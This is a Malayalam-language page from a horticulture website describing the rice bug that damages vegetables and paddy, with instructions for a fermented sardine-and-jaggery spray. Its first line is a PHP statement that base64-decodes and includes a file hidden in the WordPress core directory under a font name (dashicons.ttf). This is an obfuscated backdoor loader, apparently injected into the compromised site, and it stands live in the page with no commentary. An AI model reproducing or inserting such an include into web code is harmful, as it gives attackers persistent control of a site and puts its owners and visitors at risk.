@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); ചാഴി നിയന്ത്രണവും പ്രതിരോധവും – പച്ചക്കറികളെ ആക്രമിക്കുന്ന കീടങ്ങള്‍ | HORTICOPS

ചാഴി നിയന്ത്രണവും പ്രതിരോധവും – പച്ചക്കറികളെ ആക്രമിക്കുന്ന കീടങ്ങള്‍

പച്ചക്കറികളെയും നെല്ലിനെയും ആക്രമിക്കുന്ന ഒരു ഷഡ്പദമാണ് ചാഴി. നീരും പാലും ഊറ്റിക്കുടിച്ച്‌ ധാന്യവിളവ്‌ നശിപ്പിക്കുകയാണ് ചെയ്യുന്നത്. പച്ചക്കറികളില്‍ , പയർ വർഗ്ഗങ്ങളിലാണ് ഇവയുടെ ആക്രമണം കൂടുതലായി കണ്ടുവരുന്നത്. നെല്‍കൃഷിയില്‍ ഇവയുടെ ആക്രമണം വലിയ നഷ്ട്ടം ആണുണ്ടാക്കുന്നത്. കതിർകുല പുറത്തുവന്ന് പാൽ നിറഞ്ഞിരിക്കുന്ന സമയത്താണ് ഇവയുടെ ആക്രമണം . ഈ പ്രാണികള്‍ നെന്മണികൾ തുളച്ച് ഉള്ളിലെ പാൽ വലിച്ചുകുടിച്ച് മണികൾ പതിരാക്കി മാറ്റുന്നു.

നിയന്ത്രണ മാര്‍ഗങ്ങള്‍
1, മത്തിയും ശർക്കരയും ചേർത്തുള്ള മിശ്രിതം തളിച്ച് ഇവയെ നിയന്ത്രിക്കാം. മത്തിയും ശര്‍ക്കരയും തുല്യ അളവില്‍ ചേര്‍ത്ത് പാത്രത്തിലിട്ട് മൂന്നാഴ്ച അടച്ചുവെച്ചാണ് മത്തി-ശര്‍ക്കരമിശ്രിതം തയ്യാറാക്കുന്നത്. ഫിഷ്‌ അമിനോ ആസിഡ് ഉണ്ടാക്കുന്ന വിധം നോക്കുക. മൂന്നു ആഴ്ച കഴിഞ്ഞു മത്തി-ശര്‍ക്കരമിശ്രിതം അരിച്ചെടുക്കുക്ക. ഒരുലിറ്റര്‍ വെള്ളത്തിന് 15 മില്ലി ലിറ്റര്‍ എന്ന തോതില്‍ കലര്‍ത്തി തളിച്ച് കൊടുക്കാം. ഏറ്റവും ചെലവു കുറഞ്ഞ ഈ മാര്‍ഗം ഉപയോഗിച്ചു ഒരേക്കറില്‍ വെറും ഒന്നരലിറ്റര്‍ മിശ്രിതം കൊണ്ട് ഇവയെ നിയന്ത്രിക്കാം.

Share Now

Leave a Reply

Your email address will not be published. Required fields are marked *